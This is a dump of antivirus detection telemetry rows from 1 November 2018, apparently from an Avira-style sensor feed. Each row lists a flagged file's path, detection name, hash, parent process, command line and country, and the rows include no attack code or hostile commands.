  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T04:43:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='estimasi acc.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\THR 2016\\ESTIMASI ACC\\ESTIMASI ACC.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='العاب.exe', filepath='D:\\العاب\\العاب.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='0c744eeabe3b9d51114647b7d603de2bcd16f14ac8aaa6b0f5dc665895bdf719', metadata=Row(cmdline='\\\\\\/connectToHost ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Launcher\\Avira.Systray.exe', parentsize=307184, timestamp='2018-11-01T18:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhd4db', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHD4DB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='desember.scr', filepath='D:\\DATA_SHARE\\audit\\2016\\DESEMBER\\DESEMBER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T04:52:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155514-ba08107c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155514-BA08107C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wwwords.exe', filepath='F:\\ACER SUKABIRUS\\Dra.NETI\\analisis\\flasdic\\GameHouse\\WildWords\\wwwords.exe', filesize=384000, name='W32/Chir.B.#M1.#R1'), hash='215e7325922382514fdc436d5b873058c751842a0812528cfd0e4f0cfb25748f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T17:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:51:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='muradbasic_denis.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Muradbasic_Denis.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='a212991f5b0316c1b818af5c6614a00237121a35bc45cca3e5d66469ec07cc7d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.pif', filepath='\\?\\H:\\System Volume Information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124921-076b9126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124900-F5A7ED53\\AVSCAN-20181101-124921-076B9126', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AF72B66B2F660B297BA6C87CB99002509DFBD19E8BF9A9B09B9005E89C1B3A41', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195022-c059c638', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195022-C059C638', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013836-461d41f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013644-3001918A\\AVSCAN-20181102-013836-461D41F8', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='88a03271b84e4c8ba1f02e90e45ee298736ce610765a9c68fa9235c35624984a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151334-1ade30e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-151334-1ADE30E9', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wijdq.exe', filepath='C:\\ProgramData\\RoyaalCouponu\\WIJdq.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23816, timestamp='2018-11-01T21:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\sv_daily.1\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T11:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\desktop\\wp-encrypt\\Neuer Ordner (2)\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:56:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191243-3eb95ffb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191243-3EB95FFB', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214307-7573b309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1875d52\\AVSCAN-20181101-214244-723196F0\\AVSCAN-20181101-214307-7573B309', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:43:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsmA5E1.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-01T12:25:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='80b2f42fdc9cbb8405968e675a6414ffb3278dfdfff040db266a3848913dbf76.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\80B2F42FDC9CBB8405968E675A6414FFB3278DFDFFF040DB266A3848913DBF76.VIR', filesize=256000, name='W2000M/Agent.756544.#M1.#R1'), hash='80b2f42fdc9cbb8405968e675a6414ffb3278dfdfff040db266a3848913dbf76', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:16:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ\\หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='8153e8de9940ffac59c15913eeaeb2c711f597ca1d8a16051772995a82929764', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autopatcher.exe', filepath='E:\\Mido\\UnitedGenerals\\Autopatcher.exe', filesize=1664000, name='TR/Atom.diukt.#M1.#R1'), hash='70b12a0532bd469190d928d5abb80014175985bb2a371c9bdf13aa0a2cd8fe0b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:07:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='css.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\css\\css.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0005807.exe', filepath='G:\\System Volume Information\\_restore{750EC152-9F24-45D5-8485-877A6CF3B72C}\\RP10\\A0005807.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='e93b0ddf10fddbeac359996e33ce8d50f6150392c263535dd6c4895752f238f9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110939-9a925cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110748-853D8FC6\\AVSCAN-20181101-110939-9A925CCE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:09:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\6W6LABVXRO\\uninstaller.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='a5d484184ac1e495dd72cc2cffab595c03ec483e95423b36b66d82e151c95b2b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:SjFU3yQSL0W31hLY.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:33:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215639-3aa1364b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-215639-3AA1364B', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='82d2c912d75b65f12414804d21d391ddd031b062bc31ae9ae9e7610abd1c9434', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002550-4e48cc01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002550-4E48CC01', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Neuer Ordner\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Neuer Ordner\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:00:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='S:\\dasi\\LwS\\Server\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='8172c85bfccbdf9b8fcf165c6ad31824535fc0ab9e28364d55d6fd67f60572d8', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\dasi.buj \\\\\\/force \\\\\\/speed:fast \\\\\\/mode:full', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10765312, timestamp='2018-11-01T21:34:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0114436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0114436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000021-3e27d571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ba0c15b\\AVSCAN-20181102-000002-3BB68318\\AVSCAN-20181102-000021-3E27D571', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gallery.exe', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\_XX\\Custom\\Images\\Gallery\\Gallery.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7d3b3b7dd8a1433488fe97914613de0b3f0141c1c9d716c7c0f3b6ddcba70f01', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193654-d89b3cfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81be5838\\AVSCAN-20181101-193612-D043D6A1\\AVSCAN-20181101-193654-D89B3CFA', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=384000, name='SPR/Hacktool.002b10.#M1.#R1'), hash='002b106a99023edc62a5bd957b6276646a15a36c45cf1aa798f74aceb4f9c504', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\DVDFab.v9.3.1.9.ITA-iCV-CreW\\Patch\\Patch.exe', parentsize=390656, timestamp='2018-11-01T10:45:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='713ae7ac160cb787b36c048b848c5e3e9893ca4909b3b7675ea0090f7a6ff5c6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\713AE7AC160CB787B36C048B848C5E3E9893CA4909B3B7675EA0090F7A6FF5C6', filesize=2304000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='713ae7ac160cb787b36c048b848c5e3e9893ca4909b3b7675ea0090f7a6ff5c6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:44Z'), dt=datetime.date(2018, 11, 1)),
